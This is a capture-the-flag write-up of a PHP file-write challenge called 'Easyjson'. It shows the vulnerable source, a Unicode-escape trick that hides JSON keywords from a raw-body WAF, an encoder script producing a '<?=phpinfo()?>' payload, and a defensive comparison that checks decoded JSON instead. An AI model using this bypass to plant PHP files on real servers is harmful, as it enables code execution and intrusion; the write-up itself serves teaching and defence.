Preface
I'm too weak, I only solved one problem.
Easyjson
- Code audit
<?php
include 'security.php';
if(!isset($_GET['source'])){
    show_source(__FILE__);
    die();
}
// One sandbox directory per client, keyed on the X-Forwarded-For header
$sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'/';
var_dump($sandbox);
if(!file_exists($sandbox)){
    mkdir($sandbox);
    file_put_contents($sandbox."index.php","<?php echo 'Welcome To Dbapp OSS.';?>");
}
$action = $_GET['action'];
$content = file_get_contents("php://input");
// SecurityCheck() (from security.php) is the WAF applied to the raw filename and raw body
if($action == "write" && SecurityCheck('filename',$_GET['filename']) &&SecurityCheck('content',$content)){
    $content = json_decode($content);
    $filename = $_GET['filename'];
    $filecontent = $content->content;
    $filename = $sandbox.$filename;
    file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS.");
}elseif($action == "reset"){
    $files = scandir($sandbox);
    foreach($files as $file) {
        if(!is_dir($file)){
            if($file !== "index.php"){
                unlink($sandbox.$file);
            }
        }
    }
}
else{
    die('Security Check Failed.');
}
- The main part of the code is the write branch below, but a WAF filters both the filename and the content parameter. Some quick fuzzing showed that filename may carry a .php extension, so a PHP file can be written. The key problem is content: the body must be JSON with a content property, for example {"content":"<?=phpinfo()?>"}, but the WAF filters the JSON and the string content must not appear in it (other keywords are filtered too).
if($action == "write" && SecurityCheck('filename',$_GET['filename']) &&SecurityCheck('content',$content)){
    $content = json_decode($content);
    $filename = $_GET['filename'];
    $filecontent = $content->content;
    $filename = $sandbox.$filename;
    file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS.");
}
- Found in 神小密圈: JSON strings support Unicode escapes (\uXXXX), so why not replace the entire string with Unicode escapes? The WAF inspects the raw body, but json_decode() resolves the escapes, so the decoded object still has its content property.
- A quick test confirmed it works. Unicode table
- A quick script to convert a string into Unicode escapes.
<?php
// Map one printable ASCII character to its JSON \uXXXX escape.
// The table key holds the first three hex digits of the code point and the
// position inside the row supplies the last hex digit.
function unicode_encode($str){
    $table = [
        '\u002'=>[' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'],
        '\u003'=>['0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'],
        '\u004'=>['@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'],
        '\u005'=>['P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'],
        '\u006'=>['`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'],
        '\u007'=>['p','q','r','s','t','u','v','w','x','y','z','{','|','}','~']
    ];
    foreach ($table as $key => $value) {
        $i = 0;
        foreach ($value as $vcode) {
            $i = $i + 1;
            if ($str === $vcode) {   // strict comparison: '0' must not match ' '
                return $key.bin2e($i-1);
            }
        }
    }
    // Characters outside the table (e.g. newline) are passed through unchanged
    return $str;
}
// Turn a column index 0-15 into a single lowercase hex digit
function bin2e($str){
    return dechex($str);
}
// Encode every character of $str and return the escaped string (also echoed)
function main($str){
    $out = '';
    for($i=0;$i<strlen($str);$i++){
        $out .= unicode_encode($str[$i]);
    }
    echo $out;
    return $out;
}
main('<?=phpinfo()?>');
?>
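Why the escaped body slips past the filter, and what a check on the decoded data looks like instead. This is an added example, not the challenge's security.php (whose source is not shown in the writeup); the blacklist and the two request bodies are constructed for illustration.

```php
<?php
// Weak check: looks for the keyword in the raw request body, before JSON
// decoding. A body whose keys/values are written as \uXXXX escapes never
// contains the literal bytes of the keyword, yet json_decode() restores them.
function rawKeywordCheck(string $raw, array $blacklist): bool {
    foreach ($blacklist as $word) {
        if (stripos($raw, $word) !== false) {
            return false;
        }
    }
    return true;
}

// Hardened check: decode first, then inspect every key and every string value
// of the decoded structure, so escape sequences cannot hide the keyword.
function decodedKeywordCheck(string $raw, array $blacklist): bool {
    $data = json_decode($raw, true, 32);
    if (json_last_error() !== JSON_ERROR_NONE) {
        return false;                  // reject anything that is not valid JSON
    }
    $stack = [$data];
    while ($stack) {
        $item = array_pop($stack);
        if (is_array($item)) {
            foreach ($item as $k => $v) {
                $stack[] = (string)$k; // object keys are inspected as strings too
                $stack[] = $v;
            }
        } elseif (is_string($item)) {
            foreach ($blacklist as $word) {
                if (stripos($item, $word) !== false) {
                    return false;
                }
            }
        }
    }
    return true;
}

// Constructed blacklist and bodies (the real WAF's keyword list is not on the page).
$blacklist = ['content', 'php'];
$plain   = '{"content":"<?=phpinfo()?>"}';
// Same payload with key and value fully written as \uXXXX escapes
$escaped = '{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":'
         . '"\u003c\u003f\u003d\u0070\u0068\u0070\u0069\u006e\u0066\u006f\u0028\u0029\u003f\u003e"}';

var_dump(rawKeywordCheck($plain, $blacklist));       // raw check rejects the plain body
var_dump(rawKeywordCheck($escaped, $blacklist));     // raw check passes the escaped body
var_dump(decodedKeywordCheck($escaped, $blacklist)); // decoded check rejects it
var_dump(json_decode($escaped)->content);            // the key is "content" again after decoding
```

Inspecting decoded data closes this particular gap; restricting filename to a whitelist pattern without a .php extension would remove the write primitive regardless of how the body is encoded.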
- EXP
- Getflag